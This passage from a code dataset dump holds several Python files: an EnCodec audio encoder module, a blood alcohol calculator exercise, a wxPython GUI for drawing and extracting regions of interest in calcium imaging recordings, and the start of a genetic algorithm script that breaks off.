implementation.\"\"\"\r\n\r\nimport math\r\nimport typing as tp\r\nfrom pathlib import Path\r\n\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\n\r\nfrom . import SEANetEncoder\r\n\r\nEncodedFrame = tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]\r\n\r\n\r\nclass EncodecEncoder(nn.Module):\r\n    \"\"\"EnCodec model operating on the raw waveform.\r\n    Args:\r\n        encoder (nn.Module): Encoder network.\r\n        sample_rate (int): Audio sample rate.\r\n        channels (int): Number of audio channels.\r\n        normalize (bool): Whether to apply audio normalization.\r\n        segment (float or None): segment duration in sec. 
when doing overlap-add.\r\n Pass `None` to use the full input duration as segment.\r\n overlap (float): overlap between segment, given as a fraction of the segment duration.\r\n name (str): name of the model, used as metadata when compressing audio.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n encoder: SEANetEncoder,\r\n sample_rate: int,\r\n channels: int,\r\n normalize: bool = False,\r\n segment: tp.Optional[float] = None,\r\n overlap: float = 0.01,\r\n name: str = \"unset\",\r\n ):\r\n super().__init__()\r\n self.encoder = encoder\r\n self.sample_rate = sample_rate\r\n self.channels = channels\r\n self.normalize = normalize\r\n self.segment = segment\r\n self.overlap = overlap\r\n self.frame_rate = math.ceil(self.sample_rate / np.prod(self.encoder.ratios))\r\n self.name = name\r\n\r\n @property\r\n def segment_length(self) -> tp.Optional[int]:\r\n if self.segment is None:\r\n return None\r\n return int(self.segment * self.sample_rate)\r\n\r\n @property\r\n def segment_stride(self) -> tp.Optional[int]:\r\n segment_length = self.segment_length\r\n if segment_length is None:\r\n return None\r\n return max(1, int((1 - self.overlap) * segment_length))\r\n\r\n @property\r\n def output_shape_per_segment(self) -> tuple[int, int]:\r\n return (self.encoder.dimension, self.frame_rate * self.segment)\r\n\r\n def encode(self, x: torch.Tensor) -> tp.List[EncodedFrame]:\r\n \"\"\"Given a tensor `x`, returns a list of frames containing\r\n the embeddings for `x`, along with rescaling factors\r\n for each segment, when `self.normalize` is True.\r\n \"\"\"\r\n assert x.dim() == 3\r\n _, channels, length = x.shape\r\n assert channels > 0 and channels <= 2\r\n segment_length = self.segment_length\r\n if segment_length is None:\r\n segment_length = length\r\n stride = length\r\n else:\r\n stride = self.segment_stride # type: ignore\r\n assert stride is not None\r\n\r\n encoded_frames: tp.List[EncodedFrame] = []\r\n for offset in range(0, length, stride):\r\n frame = x[:, :, offset : offset + segment_length]\r\n encoded_frames.append(self._encode_frame(frame))\r\n return encoded_frames\r\n\r\n def _encode_frame(self, x: torch.Tensor) -> EncodedFrame:\r\n length = x.shape[-1]\r\n duration = length / self.sample_rate\r\n assert self.segment is None or duration <= 1e-5 + self.segment\r\n\r\n if self.normalize:\r\n mono = x.mean(dim=1, keepdim=True)\r\n volume = mono.pow(2).mean(dim=2, keepdim=True).sqrt()\r\n scale = 1e-8 + volume\r\n x = x / scale\r\n scale = scale.view(-1, 1)\r\n else:\r\n scale = None\r\n\r\n emb = self.encoder(x)\r\n return emb\r\n\r\n def forward(self, x: torch.Tensor) -> torch.Tensor:\r\n frames = self.encode(x)\r\n return frames\r\n\r\n @staticmethod\r\n def encodec_model_48khz(\r\n pretrained: bool = True,\r\n repository: tp.Optional[tp.Union[Path, str]] = None,\r\n segment: float = 1.0,\r\n overlap: float = 0.01,\r\n ):\r\n \"\"\"Return the pretrained 48khz model.\"\"\"\r\n if repository:\r\n assert pretrained\r\n repository = Path(repository) if isinstance(repository, str) else repository\r\n checkpoint_name = \"encodec_encoder_48khz.pt\"\r\n sample_rate = 48_000\r\n channels = 2\r\n causal = False\r\n model_norm = \"time_group_norm\"\r\n audio_normalize = True\r\n name = \"encodec_48khz\" if pretrained else \"unset\"\r\n\r\n encoder = SEANetEncoder(channels=channels, norm=model_norm, causal=causal)\r\n\r\n model = EncodecEncoder(\r\n encoder=encoder,\r\n sample_rate=sample_rate,\r\n channels=channels,\r\n normalize=audio_normalize,\r\n segment=segment,\r\n overlap=overlap,\r\n 
name=name,\r\n )\r\n if pretrained:\r\n if not repository.is_dir():\r\n raise ValueError(f\"{repository} must exist and be a directory.\")\r\n state_dict = torch.load(repository / checkpoint_name)\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n return model\r\n\r\n @staticmethod\r\n def encodec_model_24khz(\r\n pretrained: bool = True,\r\n repository: tp.Optional[tp.Union[Path, str]] = None,\r\n segment: float = None,\r\n overlap: float = 0.01,\r\n ):\r\n \"\"\"Return the pretrained 24khz model.\"\"\"\r\n if repository:\r\n assert pretrained\r\n repository = Path(repository) if isinstance(repository, str) else repository\r\n checkpoint_name = \"encodec_encoder_24khz.pt\"\r\n sample_rate = 24_000\r\n channels = 1\r\n causal = True\r\n model_norm = \"weight_norm\"\r\n audio_normalize = False\r\n name = \"encodec_24khz\" if pretrained else \"unset\"\r\n\r\n encoder = SEANetEncoder(channels=channels, norm=model_norm, causal=causal)\r\n\r\n model = EncodecEncoder(\r\n encoder=encoder,\r\n sample_rate=sample_rate,\r\n channels=channels,\r\n normalize=audio_normalize,\r\n segment=segment,\r\n overlap=overlap,\r\n name=name,\r\n )\r\n if pretrained:\r\n if not repository.is_dir():\r\n raise ValueError(f\"{repository} must exist and be a directory.\")\r\n state_dict = torch.load(repository / checkpoint_name)\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n return model\r\n","repo_name":"pcmbs/preset-embedding_audio-model-selection","sub_path":"src/models/encodec/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4811978292","text":"\nwhile True :\n\ttry:\n\t\tW = float(input(\"What is your weight in pound:\"))\n\t\tr = input(\"What is your gender? 
'female' or 'male':\").lower()\n\t\tA = float(input(\"The amount of alcohol by volume of the drinks consumed in ounces:\"))\n\t\tH = float(input(\"The number of hour since last drink:\"))\n\t\tbreak\n\texcept ValueError:\n\t\tprint(\"Try again\")\n\n\nif r == 'female' or r == 'f':\n\tr = 0.66\nelse:\n\tr = 0.73\n\nBAC= round(((A * 5.14)/(W/r))- (0.15*H),2)\n\nif BAC >=0.08:\n\tprint(f\"Your BAC is {BAC},It is not legal for you to drive\")\nelse:\n\tprint(f\"Your BAC is {BAC},You can drive, but stay safe\")\n","repo_name":"Ruchiya/57ExercisesForProgrammer","sub_path":"17_Blood_Alcohol_Calculator.py","file_name":"17_Blood_Alcohol_Calculator.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26007776744","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport matplotlib\nmatplotlib.use('WXAgg')\nimport scipy.io as so\nimport wx\nimport h5py\nimport os\nimport re\nimport numpy as np\nfrom roipoly import roipoly\nfrom sleepy import get_snr, load_stateidx #added this line to test plotting stateidx\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\n    FigureCanvasWxAgg as FigCanvas, \\\n    NavigationToolbar2WxAgg as NvigationToolbar\nfrom Utility import *\nfrom imaging import *\n# to test whether point lies within polygon\nfrom shapely.geometry import Point\nfrom shapely.geometry.polygon import Polygon\n\n# new imports \nimport imaging as img\nimport Utility as ut\nimport matplotlib.pylab as plt\n\n### Debugger\nimport pdb\n\n\n\n# for a wxpython gui you\n# need to inherit the class wx.Frame\nclass ImageViewer(wx.Frame) :\n\n    def __init__(self, ipath):\n        wx.Frame.__init__(self, None, -1, \"\", size=(600,100), pos=(100,100))\n\n        # folders\n        self.ipath = ipath\n        self.name = \"\"\n\n        # roi management\n        self.proi_mode = False\n        self.pcollect_roi = False\n        self.proi_delete = False\n        self.pdisk = False\n        self.curr_roi_x = []\n        self.curr_roi_y = []\n        self.roi_id = 1\n        self.roi_name = ''\n        self.cmap = np.zeros((1,3))\n        # shape: [(xcoords, ycoords),...]\n        self.ROIs = []\n        self.ROI_coords = []\n\n        self.dpi = 100\n        self.icursor = 0\n        self.dt = 20\n        self.sr = -1\n        # recording contains spectrogram\n        self.sp_exists = True\n        #self.pcorr_stack = True\n        self.file_type = '_aligned.hdf5'\n        self.create_menu()\n\n\n    def setup_imaging(self) :\n        # load spectrum\n        if os.path.isfile(os.path.join(self.ipath, self.name, 'sp_' + self.name + '.mat')):\n            P = so.loadmat(os.path.join(self.ipath, self.name, 'sp_' + self.name + '.mat'))\n            self.SP = P['SP']\n            self.freq = P['freq']\n            self.stime = P['t'][0]\n            self.sdt = self.stime[1]-self.stime[0]\n            self.sp_exists = True\n\n        # read image stack\n        if os.path.isfile(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_aligned.hdf5')):\n            fid = h5py.File(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_aligned.hdf5'))\n            print(\"loaded motion corrected file (*_aligned.hdf5)\")\n        else:\n            self.file_type = '_downsampcorr.hdf5'\n            fid = h5py.File(os.path.join(self.ipath, self.name, 'recording_' + self.name + self.file_type))\n\n        self.stack = fid['images']\n        self.nframes = self.stack.shape[0]\n\n\n        # read mean of disk filtered stack\n        if os.path.isfile(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_actmap.mat')):\n            self.disk_img = so.loadmat(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_actmap.mat'))['mean']\n        else:\n            self.disk_img = self.stack[0,:,:]\n\n        # read brain states\n        # test 
if sleep state file exists\n if os.path.isfile(os.path.join(self.ipath, self.name, 'remidx_' + self.name + '.txt')): #added remidx'z' on the string to remove this dependence\n tmp = load_stateidx(self.ipath, self.name)\n else:\n tmp = np.zeros((0,))\n self.M = np.zeros((1, tmp.shape[0]))\n self.M[0,:] = tmp\n\n # get colorrange minimum and maximum values\n tmp = self.stack[1000:1500,20:-20,20:-20]\n self.cmin = tmp.min()\n self.cmax = tmp.max()\n\n self.panel = wx.Panel(self)\n self.Bind(wx.EVT_CHAR_HOOK, self.on_key_down)\n\n # call functions\n self.create_image_axes()\n # called each time something is supposed to change on the figure\n self.draw_figure() \n\n\n \n def create_menu(self) :\n \"\"\"\n create menu allowing the user to select an imaging folder\n \"\"\"\n self.menubar = wx.MenuBar()\n \n menu_file = wx.Menu()\n m_expt = menu_file.Append(-1, \"&Open Folder\\tCtrl-o\", \"open imaging folder\")\n self.Bind(wx.EVT_MENU, self.on_open, m_expt)\n menu_file.AppendSeparator()\n m_exit = menu_file.Append(-1, \"&Exit\\tCtrl-X\", \"Exit\")\n self.Bind(wx.EVT_MENU, self.on_exit, m_exit)\n \n menu_help = wx.Menu()\n m_about = menu_help.Append(-1, \"&About\\tF1\", \"Help\")\n #self.Bind(wx.EVT_MENU, self.on_about, m_about)\n\n # Menu for ROI processing\n menu_roi = wx.Menu()\n # Extract ROIs\n m_extract = menu_roi.Append(-1, \"&Extract ROI\\tF2\", \"ROI\")\n self.Bind(wx.EVT_MENU, self.on_extract, m_extract)\n # Plot ROIs\n m_plot = menu_roi.Append(-1, \"&Plot ROI\\tF3\", \"Plot\")\n self.Bind(wx.EVT_MENU, self.on_plot, m_plot)\n \n \n self.menubar.Append(menu_file, \"&File\")\n self.menubar.Append(menu_help, \"&Help\")\n self.menubar.Append(menu_roi, \"&ROI Processing\")\n self.SetMenuBar(self.menubar)\n\n \n def create_image_axes(self) :\n \"\"\"\n draw all the elements on the figure\n \"\"\"\n\n self.fig = Figure((5.0, 5.0), facecolor='white', dpi=100)\n self.canvas = FigCanvas(self.panel, -1, self.fig)\n self.axes = self.fig.add_axes([0.05, 0.28, 0.9, 0.72])\n\n if self.sp_exists:\n img_time = img.imaging_timing(self.ipath, self.name)\n # python 2:\n #closest_time = lambda(it, st) : np.argmin(np.abs(it-st))\n # python 3:\n def closest_time(it, st):\n return np.argmin(np.abs(it-st))\n\n nf = np.min((self.nframes, img_time.shape[0]))\n try:\n last_state = closest_time(img_time[nf-1], self.stime)\n except:\n #HERE just some hack 10/6/17\n last_state = self.M.shape[1]\n self.sr = 1.0 / np.mean(np.diff(img_time))\n\n # axes for EEG spectrogram\n if self.sp_exists:\n self.axes_eeg = self.fig.add_axes([0.05, 0.13, 0.9, 0.14])\n SP = self.SP[0:31,0:last_state+1]\n SP = np.flipud(SP)\n tmp = self.axes_eeg.imshow(SP)\n tmp.set_clim((SP.min(), np.median(SP[:])*20))\n self.axes_eeg.axis('tight')\n self.axes_eeg.set_xticks([])\n self.axes_eeg.set_yticks([29, 19, 9])\n self.axes_eeg.yaxis.set_label_position(\"right\")\n self.axes_eeg.set_yticklabels([0, 10, 20], fontsize=9)\n self.axes_eeg.set_ylabel('Freq (Hz)', fontsize=9)\n\n\n # show brain state\n if self.sp_exists:\n self.axes2 = self.fig.add_axes([0.05, 0.08, 0.9, 0.04])\n cmap = plt.cm.jet\n my_map = cmap.from_list('ha', [[0,1,1],[1,0,1], [0.8, 0.8, 0.8]], 3)\n tmp = self.axes2.imshow(self.M)\n tmp.set_cmap(my_map)\n self.axes2.axis('tight')\n tmp.axes.get_xaxis().set_visible(False)\n tmp.axes.get_yaxis().set_visible(False)\n \n # time point tick\n self.axes3 = self.fig.add_axes([0.05, 0.08, 0.9, 0.02])\n self.axes3.set_xticks(np.arange(0, self.nframes, self.sr*600))\n labels = np.arange(0, (self.nframes/(self.sr*60.0)), 10)\n 
self.axes3.set_xticklabels(labels)\n\n #tmp.axes.get_xaxis().set_visible(False)\n self.axes3.get_yaxis().set_visible(False)\n\n\n ### Create slider to choose image frame\n self.slider_label = wx.StaticText(self.panel, -1, \n \"Bar width (%): \")\n self.slider_width = wx.Slider(self.panel, -1, size=(200,-1),\n value=0, \n minValue=0,\n maxValue=self.nframes-1,\n style=wx.SL_AUTOTICKS | wx.SL_LABELS)\n self.slider_width.SetTickFreq(10) ## changed this (only accepts 1 arg in the new version of wx)\n self.Bind(wx.EVT_COMMAND_SCROLL_THUMBTRACK, self.on_slider_width, self.slider_width)\n\n\n ### create text box to set dt\n self.set_dt = wx.StaticText(self.panel, -1, \"dt [s]\")\n self.textbox = wx.TextCtrl(\n self.panel, \n size=(50,-1),\n style=wx.TE_PROCESS_ENTER)\n self.Bind(wx.EVT_TEXT_ENTER, self.on_text_enter, self.textbox)\n\n #########################################################\n ### ROI management widgets ##############################\n #########################################################\n\n ### text label saying ROI\n self.roi_text = wx.StaticText(self.panel, -1, \"ROIs\")\n\n \n ### create check box asking for ROI mode\n self.roi_check = wx.CheckBox(self.panel, -1, \n \"Show ROIs\",\n style=wx.ALIGN_RIGHT)\n self.Bind(wx.EVT_CHECKBOX, self.on_roi_check, self.roi_check)\n\n\n\n ### check box asking for disk image\n self.disk_check = wx.CheckBox(self.panel, -1, \n \"Show Disk\",\n style=wx.ALIGN_RIGHT)\n self.Bind(wx.EVT_CHECKBOX, self.on_disk_check, self.disk_check)\n\n ### create NEW Button\n self.button_new = wx.Button(self.panel, -1, \"NEW\")\n self.Bind(wx.EVT_BUTTON, self.on_button_new, self.button_new)\n\n ### create LOAD Button\n self.button_load = wx.Button(self.panel, -1, \"LOAD\")\n self.Bind(wx.EVT_BUTTON, self.on_button_load, self.button_load)\n \n ### create SAVE Button\n self.button_save = wx.Button(self.panel, -1, \"SAVE\")\n self.Bind(wx.EVT_BUTTON, self.on_button_save, self.button_save)\n\n ### somehow position all these widgets\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n self.vbox.Add(self.canvas, 1, wx.LEFT | wx.TOP | wx.GROW)\n #self.vbox.Add(self.toolbar, 0, wx.EXPAND)\n #self.vbox.AddSpacer(10)\n\n\n \n #flags = wx.ALIGN_CENTER | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL\n #self.hbox.Add(self.cb_grid, 0, border=3, flag=flags)\n #self.hbox.AddSpacer(0)\n #self.hbox.Add(self.slider_label, 0, flag=flags)\n #self.hbox.Add(self.slider_width, 0, border=3, flag=wx.EXPAND)\n\n self.bhox_slider = wx.BoxSizer(wx.HORIZONTAL)\n self.bhox_slider.AddSpacer(25)\n self.bhox_slider.Add(self.slider_width, 1, border=0, flag=wx.TOP | wx.EXPAND | wx.ALIGN_CENTER)\n self.bhox_slider.AddSpacer(25)\n self.vbox.Add(self.bhox_slider, 0, border=0, flag = wx.ALIGN_CENTER | wx.EXPAND)\n #self.vbox.Add(self.slider_width, 0, border=0, flag = wx.BOTTOM | wx.ALIGN_CENTER | wx.EXPAND)\n \n # horizontal box for time setp\n self.hbox = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox.Add(self.set_dt, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox.Add(self.textbox, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.vbox.Add(self.hbox, 0, flag = wx.BOTTOM | wx.ALIGN_CENTER | wx.EXPAND)\n\n\n ### horizontal box for ROI management\n self.hbox_roi = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_roi.Add(self.roi_text, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.button_new, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.button_load, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.button_save, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.roi_check, 0, border=3, 
flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.disk_check, 0, border=3, flag=wx.TOP | wx.LEFT)\n # finally add to big vertical box\n self.vbox.Add(self.hbox_roi, 0, flag = wx.BOTTOM | wx.ALIGN_CENTER | wx.EXPAND)\n\n\n self.panel.SetSizer(self.vbox)\n self.vbox.Fit(self)\n\n self.axes.figure.canvas.mpl_connect('button_press_event', self.on_pick)\n\n\n def draw_figure(self):\n \n # plot current imaging frame\n self.axes.clear()\n if self.pdisk == True and self.proi_mode == True:\n img = self.axes.imshow(self.disk_img)\n else:\n img = self.axes.imshow(self.stack[self.icursor,:,:])\n img.set_clim((self.cmin, self.cmax))\n img.set_cmap('gray')\n # No x and y tick labels:\n img.axes.get_xaxis().set_visible(False)\n img.axes.get_yaxis().set_visible(False)\n self.axes.axis('tight')\n\n # show current time point\n self.axes3.clear()\n self.axes3.plot(self.icursor, 0, 'r^')\n self.axes3.set_xlim([0, self.nframes])\n self.axes3.set_xticks(np.arange(0, self.nframes, self.sr*600))\n labels = np.arange(0, (self.nframes/(self.sr*60.0)), 10)\n self.axes3.set_xticklabels(labels, fontsize=9)\n self.axes3.set_xlabel('Time (min)', fontsize=9)\n\n # draw ROIs\n if self.proi_mode == True :\n self.draw_rois()\n if self.pcollect_roi == True :\n self.draw_current_roi()\n self.canvas.draw() \n\n \n ### draw ROIs\n def draw_rois(self) :\n i=0\n for (x,y) in self.ROIs :\n # NOTE: x and y coordinates are exchanged!!\n # imshow and Line2D assume different coordinate arrangements!!\n l = plt.Line2D(y+[y[0]], x+[x[0]], color=self.cmap[i,:])\n self.axes.text(np.max(y)-5, np.min(x)+7, str(i), fontsize=10, color=self.cmap[i,:],bbox=dict(facecolor='w', alpha=0.))\n self.axes.add_line(l)\n i = i+1\n \n\n def draw_current_roi(self) :\n # NOTE: x and y exchanged!\n l = plt.Line2D(self.curr_roi_y, self.curr_roi_x, color='r', marker='.')\n self.axes.add_line(l)\n \n\n ### CALLBACKS\n def on_slider_width(self, event):\n self.icursor = self.slider_width.GetValue()\n self.draw_figure()\n event.Skip()\n\n def on_key_down(self, event):\n keycode = event.GetKeyCode()\n #print keycode\n #cursor to the right\n if keycode == 316 :\n self.icursor = self.icursor+self.dt\n self.slider_width.SetValue(self.icursor)\n self.draw_figure()\n #cursor to the left\n if keycode == 314 :\n if self.icursor >= self.dt:\n self.icursor = self.icursor - self.dt\n self.slider_width.SetValue(self.icursor)\n self.draw_figure()\n\n # 'a' pressed: start drawing new roi\n if keycode == 65 :\n if self.proi_mode == True :\n self.pcollect_roi = True\n\n # 'c' pressed: stop drawing the current roi\n if keycode == 67 :\n if self.proi_mode == True :\n self.pcollect_roi = False\n self.curr_roi_x = []\n self.curr_roi_y = []\n self.draw_figure()\n\n # 'r' pressed: register current roi\n if keycode == 82 :\n if self.proi_mode == True and self.pcollect_roi == True :\n self.ROIs.append((self.curr_roi_x[:], self.curr_roi_y[:]))\n self.curr_roi_x = []\n self.curr_roi_y = []\n self.pcollect_roi = False\n self.set_cmap()\n self.draw_figure()\n\n # 'd' pressed: delete roi\n if keycode == 68 :\n # test for each roi if the mouse is within it, if so, delete this roi\n # now we are in roi delete mode\n self.proi_delete = True\n\n event.Skip()\n \n\n def on_text_enter(self, event) :\n self.dt = int( float(self.textbox.GetValue()) / (1.0 / self.sr) )\n #print \"dt %d\" % self.dt\n\n\n # left mouse button was pressed:\n def on_pick(self, event) :\n \"\"\"\n mouse has been clicked on the canvas\n \"\"\"\n box_points = (event.xdata, event.ydata)\n #print \"coords:\"\n #print 
box_points\n        #print self.axes.get_xlim()\n        #print self.axes.get_ylim()\n        #print self.stack.shape\n        \n        if event.inaxes == self.axes :\n            if (self.proi_mode == True) and (self.pcollect_roi == True) :\n                # This is CRUCIAL:\n                # coordinate system of imshow:\n                # 0 \n                # |\n                # |\n                # y|\n                # |\n                # |\n                # v 0-------->\n                # x\n                # the box points I get from on_pick perfectly follow this convention.\n                # When I plot (e.g. using plot) these points on the imshow figure, they appear at the right location\n                # Hence the coordinate system of imshow, extracted points and replotting points on it\n                # are consistent.\n                # However, the matrix arrangement (according to numpy) is the following:\n                #\n                # 0 \n                # |\n                # |\n                # x|\n                # |\n                # |\n                # v 0-------->\n                # y\n                # Assume imshow shows matrix M and I have according to imshow the coordinates (x, y). To get\n                # the corresponding element from the matrix, I have to type M(y, x). This is because\n                # y corresponds to the rows (which come first) and x to the columns. So,\n                # if I want to save the ROI coordinates according to the numpy matrix convention, I\n                # should save x as y and y as x:\n                # Again, I save the coordinates according to the way I access a matrix element: rows first, then columns\n                self.curr_roi_x.append(box_points[1])\n                self.curr_roi_y.append(box_points[0])\n\n                self.draw_figure()\n\n        if self.proi_mode == True and self.proi_delete == True :\n            self.proi_delete = False\n            # NOTE: change of coordinate system\n            (py,px) = (box_points[0], box_points[1])\n            point = Point(px,py)\n            i = 0\n            for r in self.ROIs :\n                (x0,y0) = (r[0][0], r[1][0])\n                polyg = Polygon(list(zip(r[0], r[1])) + [(x0,y0)])\n                if polyg.contains(point) :\n                    # delete this point\n                    self.ROIs.pop(i)\n                    self.draw_figure()\n                i = i+1\n    \n\n    def on_roi_check(self, event):\n        print(\"checked roi\")\n        if self.roi_check.IsChecked() :\n            self.proi_mode = True\n            self.draw_figure()\n        else :\n            self.proi_mode = False\n            self.curr_roi_x = []\n            self.curr_roi_y = []\n            self.draw_figure()\n\n\n    def on_disk_check(self, event):\n        if self.disk_check.IsChecked() :\n            self.pdisk = True\n            self.draw_figure()\n        else :\n            print(\"disk unchecked\")\n            self.pdisk = False\n            self.draw_figure()\n\n\n    # callback for LOAD button\n    def on_button_load(self, event):\n        self.load_rois()\n        self.draw_figure()\n\n\n    def on_button_save(self, event):\n        self.save_rois()\n\n\n    def on_button_new(self, event):\n        ddir = os.path.join(self.ipath, self.name)\n        fname_base = 'recording_' + self.name + '_roilistn' \n        files = [f for f in os.listdir(ddir) if re.match(fname_base, f)]\n        l = []\n        for f in files :\n            a = re.search('^' + fname_base + \"(\\d+)\", f)\n            if a :\n                l.append(int(a.group(1)))\n        \n        n = 1\n        if l:\n            n = max(l) + 1\n\n        print(\"creating new roilist with id %d\" % n)\n        self.roi_id = n\n\n    \n    def on_exit(self, event):\n        self.Destroy() \n    \n    \n    def on_open(self, event):\n        dlg = wx.DirDialog(\n            self, \n            message=\"Choose imaging folder...\",\n            defaultPath=self.ipath,\n            style=wx.FD_SAVE)\n        \n        if dlg.ShowModal() == wx.ID_OK:\n            self.name = os.path.split(dlg.GetPath())[-1]\n            self.setup_imaging()\n\n\n    def on_extract(self, event):\n        msg = \"\"\" Extracting ROIs and Background\n        That might take a while...\n        \"\"\"\n        dlg = wx.MessageDialog(self, msg, \"Extracting ROIs\", wx.OK)\n        dlg.ShowModal() \n        dlg.Destroy()\n        self.extract_rois()\n\n\n    def on_plot(self, event):\n        \"\"\"\n        plot ROIs; dialog asking for correction factor\n        \"\"\"\n        dlg = wx.TextEntryDialog(self, \"Set correction factor\", value='0.9')\n        dlg.ShowModal()\n        corr = float(dlg.GetValue())\n        dlg.Destroy()\n\n        
self.plot_rois(corr)\n\n    \n    ### ROI Management related functions\n    def extract_rois(self):\n        \"\"\"\n        extract ROIs and Halo Background\n        \"\"\"\n        ddir = os.path.join(self.ipath, self.name)\n        #if not self.pcorr_stack:\n        #    arec = 'recording_' + self.name + '_downsamp.hdf5'\n        #else:\n        #    arec = 'recording_' + self.name + '_downsampcorr.hdf5'\n        arec = 'recording_' + self.name + self.file_type\n        stack = img.TIFFStack(ddir, arec)\n        \n        # get the surround of each roi for background subtraction\n        Bkg, Halo = img.halo_subt(self.ROI_coords, 10, stack.nx, stack.ny, zonez=5)\n        # extract ROIs\n        print(\"starting to extract ROIs for roi list %d\" % (self.roi_id))\n        ROI = stack.get_rois(self.ROI_coords)\n        print(\"got ROIs\")\n        print(\"starting to extract background...\")\n        bROI = stack.get_rois(Halo)\n        print(\"got surround of ROIs\")\n        # Finally save Ca traces for later analysis\n        img.save_catraces(self.ipath, self.name, self.roi_id, ROI, bROI)\n\n\n    # plot calcium traces along with color coded brainstates\n    def plot_rois(self, corr):\n        \"\"\"\n        plot rois by calling function in imaging.py\n        \"\"\"\n        if os.path.isfile(os.path.join(self.ipath, self.name, 'remidx_%s.txt'%self.name)):\n            img.plot_catraces(self.ipath, self.name, self.roi_id, cf=corr, pspec=True)\n        else:\n            img.plot_catraces_simple(self.ipath, self.name, self.roi_id, cf=corr, SR=10)\n\n\n    def save_rois(self):\n        #transform gui ROI format to save format\n        self.set_roicoords()\n        img.save_roilist(self.ipath, self.name, self.ROI_coords, self.ROIs, roi_id=self.roi_id)\n        print(\"Saved roi list %d\" % (self.roi_id))\n\n    \n    def load_rois(self):\n        wildcard = \"*.mat\"\n        #dialog = wx.FileDialog(None, \"Choose a ROI list\", os.path.join(self.ipath, self.name), \"\", wildcard, wx.OPEN)\n        #09/08/17: no idea why wildcard is not working anymore??\n        dialog = wx.FileDialog(None, \"Choose a ROI list\", os.path.join(self.ipath, self.name), \"\", wildcard=wildcard, style=wx.FD_OPEN)\n        if dialog.ShowModal() == wx.ID_OK:\n            self.roi_name = dialog.GetFilename()\n            fname_base = 'recording_' + self.name + '_roilistn'\n            a = re.search('^' + fname_base + \"(\\d+)\", self.roi_name)\n            self.roi_id = int(a.group(1))\n\n            (self.ROI_coords, self.ROIs) = img.load_roilist(self.ipath, self.name, self.roi_id)\n            #nroi = len(self.ROIs)\n            #cmap = plt.get_cmap('jet')\n            #cmap = cmap(range(0, 256))[:,0:3]\n            #self.cmap = downsample_matrix(cmap, int(np.floor(256/nroi)))\n            self.set_cmap()\n            print(\"selected roi list %d\" % self.roi_id)\n\n\n    def set_cmap(self) :\n        nroi = len(self.ROIs)\n        cmap = plt.get_cmap('jet')\n        cmap = cmap(range(0, 256))[:,0:3]\n        self.cmap = ut.downsample_matrix(cmap, int(np.floor(256/nroi)))\n    \n    \n    def set_roicoords(self):\n        \"\"\"\n        get all the pixels within an roi\n        \"\"\"\n        Coords = []\n        for r in self.ROIs:\n            (X, Y) = (r[0], r[1])\n            xmin = int(round(min(X)))\n            xmax = int(round(max(X)))\n            ymin = int(round(min(Y)))\n            ymax = int(round(max(Y)))\n\n            x, y = np.meshgrid(np.arange(xmin,xmax+1), np.arange(ymin,ymax+1))\n            x, y = x.flatten(), y.flatten()\n            points = np.vstack((x,y)).T\n            points = [Point(i) for i in points]\n\n            (x0,y0) = (r[0][0], r[1][0])\n            polyg = Polygon(list(zip(r[0], r[1])) + [(x0,y0)])\n\n            tmp = [polyg.contains(i) for i in points]\n            idx = [np.nonzero(np.array(tmp)==True)][0]\n            xin = x[idx]\n            yin = y[idx]\n            xin = [i for i in xin]\n            yin = [i for i in yin] \n            Coords.append((xin,yin))\n\n        self.ROI_coords = Coords\n\n    \n\n# adding functionality to run as script:\nif __name__ == '__main__':\n    # adjust to your system:\n    ipath = '/Volumes/BB8/Penn/Data/RawImaging'\n\n    
##################################3\n    import sys\n\n    def param_check(x):\n        params = {}\n        for i in range(0, len(x)):\n            a = x[i]\n            if re.match('^-', a):\n                if i < len(x)-1 :\n                    params[a] = x[i+1]\n        \n        return params\n\n    args = sys.argv[1:]\n    params = param_check(args)\n\n\n    if '-i' in params:\n        ipath = params['-i'] \n        print(\"Using %s as base folder\" % ipath)\n\n\n    app = wx.App(False)\n    app.frame = ImageViewer(ipath)\n    app.frame.Show()\n    app.MainLoop()\n\n\n","repo_name":"tortugar/Lab","sub_path":"MiniscImaging/imaging_gui.py","file_name":"imaging_gui.py","file_ext":"py","file_size_in_byte":25163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"69907278248","text":"import random, time, math\nimport matplotlib.pyplot as plt\n\n# Define the genetic algorithm parameters\ntamanho_populacao = 10 # how many individuals will be generated in each generation.\ntaxa_mutacao = 0.01\ngeracoes = 100\n\n# Initializing the program and reading the matrix\nwith open(\"matriz\", \"r\") as f:\n    linhas = f.readlines()[1:]\nmatrix = []\nfor linha in linhas:\n    linha = linha.strip().split()\n    matrix.append(linha)\n\n# Create a list and a dictionary with the nonzero points\npontos = []\ndict_pontos = []\nfor i in range(0, len(matrix)):\n    for j in range(0, len(matrix[0])):\n        if str(matrix[i][j]) != \"0\" and matrix[i][j] != \"R\":\n            pontos.append(matrix[i][j])\n            dict_pontos.append({\"x\": i, \"y\": j, \"name\": 